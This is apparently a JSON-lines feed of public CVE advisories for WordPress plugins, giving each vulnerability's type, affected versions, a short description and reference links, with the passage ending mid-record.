{"CVE_ID":"CVE-2024-13921","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.0 via deserialization of untrusted input from the 'form_data' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5fcfa21-b3f7-4241-a931-9708ced4f811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5fcfa21-b3f7-4241-a931-9708ced4f811?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5588","slug":"image-editor-by-pixo","versionImpact":"2.3.6","description":"The Image Editor by Pixo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018download\u2019 parameter in all versions up to, and including, 2.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-editor-by-pixo\\\/trunk\\\/frontend.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-editor-by-pixo\\\/trunk\\\/frontend.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315303\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315303\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-editor-by-pixo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-editor-by-pixo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1036a34d-ec03-4bec-8455-02c83fdb8b36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1036a34d-ec03-4bec-8455-02c83fdb8b36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7822","slug":"wp-wallcreeper","versionImpact":"1.6.1","description":"The WP Wallcreeper plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_notices hook in all versions up to, and including, 1.6.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable and disable caching.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wallcreeper\\\/trunk\\\/wp-wallcreeper.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wallcreeper\\\/trunk\\\/wp-wallcreeper.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/629f36e3-f4a4-43a6-a98b-960088c8dd77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/629f36e3-f4a4-43a6-a98b-960088c8dd77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0070","slug":"responsivevoice-text-to-speech","versionImpact":"1.7.6","description":"The ResponsiveVoice Text To Speech WordPress plugin through 1.7.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d8fbd1a-9fac-42ac-94e0-f8921deb1696\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d8fbd1a-9fac-42ac-94e0-f8921deb1696\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0273","slug":"custom-content-shortcode","versionImpact":"4.0.2","description":"The Custom Content Shortcode WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5cafbba6-478f-4f5d-a2d4-60c6a22f2f1e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5cafbba6-478f-4f5d-a2d4-60c6a22f2f1e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2031","slug":"locatoraid","versionImpact":"3.9.14","description":"The Locatoraid Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900106\\\/locatoraid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900106\\\/locatoraid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/modules\\\/front\\\/view_shortcode.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/modules\\\/front\\\/view_shortcode.php#L4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba0a90b-f13c-4914-b6b7-278227ffc122?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba0a90b-f13c-4914-b6b7-278227ffc122?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3093","slug":"yaysmtp","versionImpact":"2.4.5","description":"The YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e6ec3a-c5fd-4f63-a9a0-2c9ddfb96e2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e6ec3a-c5fd-4f63-a9a0-2c9ddfb96e2e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922163\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922163\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0786","slug":"enhanced-e-commerce-for-woocommerce-store","versionImpact":"6.9.1","description":"The Conversios \u2013 Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ee_syncProductCategory function using the parameters conditionData, valueData, productArray, exclude and include in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1979\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1979\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1296","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/post.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/post.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2967","slug":"front-editor","versionImpact":"4.4.1","description":"The Guest posting \/ Frontend Posting wordpress plugin \u2013 WP Front User Submit \/ Front Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82eb759f-e8d5-40c6-998f-f6981d9d6644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82eb759f-e8d5-40c6-998f-f6981d9d6644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-editor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-editor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3231","slug":"popup4phone","versionImpact":"1.3.2","description":"The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8990","slug":"geo-mashup","versionImpact":"1.13.13","description":"The Geo Mashup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's geo_mashup_visible_posts_list shortcode in all versions up to, and including, 1.13.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88e74cb2-7b6f-43ac-bb30-4763c5afe493?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88e74cb2-7b6f-43ac-bb30-4763c5afe493?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-mashup\\\/trunk\\\/geo-mashup.php#L1755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-mashup\\\/trunk\\\/geo-mashup.php#L1755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-mashup\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-mashup\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10078","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 1.4.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L134\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10710","slug":"wp-yadisk-files","versionImpact":"1.2.5","description":"The YaDisk Files WordPress plugin through 1.2.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/165ab698-c8b5-4412-a621-c5365d621fc5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/165ab698-c8b5-4412-a621-c5365d621fc5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13920","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.6.0 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba84eb3-f48a-4175-a652-7c11b12c9afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba84eb3-f48a-4175-a652-7c11b12c9afc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3107","slug":"newsletters-lite","versionImpact":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby' parameter in all versions up to, and including, 4.9.9.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.8\\\/helpers\\\/shortcode.php#L1094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.8\\\/helpers\\\/shortcode.php#L1094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/newsletters-lite\\\/trunk\\\/helpers\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/newsletters-lite\\\/trunk\\\/helpers\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tribulant.com\\\/docs\\\/wordpress-mailing-list-plugin\\\/31\\\/#doc6:~:text=snippets%20and%20more.-,Release%20Notes,-The%20changelogs%20below\",\"name\":\"https:\\\/\\\/tribulant.com\\\/docs\\\/wordpress-mailing-list-plugin\\\/31\\\/#doc6:~:text=snippets%20and%20more.-,Release%20Notes,-The%20changelogs%20below\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/397555cf-0b0c-4ce5-97ad-59f135f9d195?source=cve\",\"n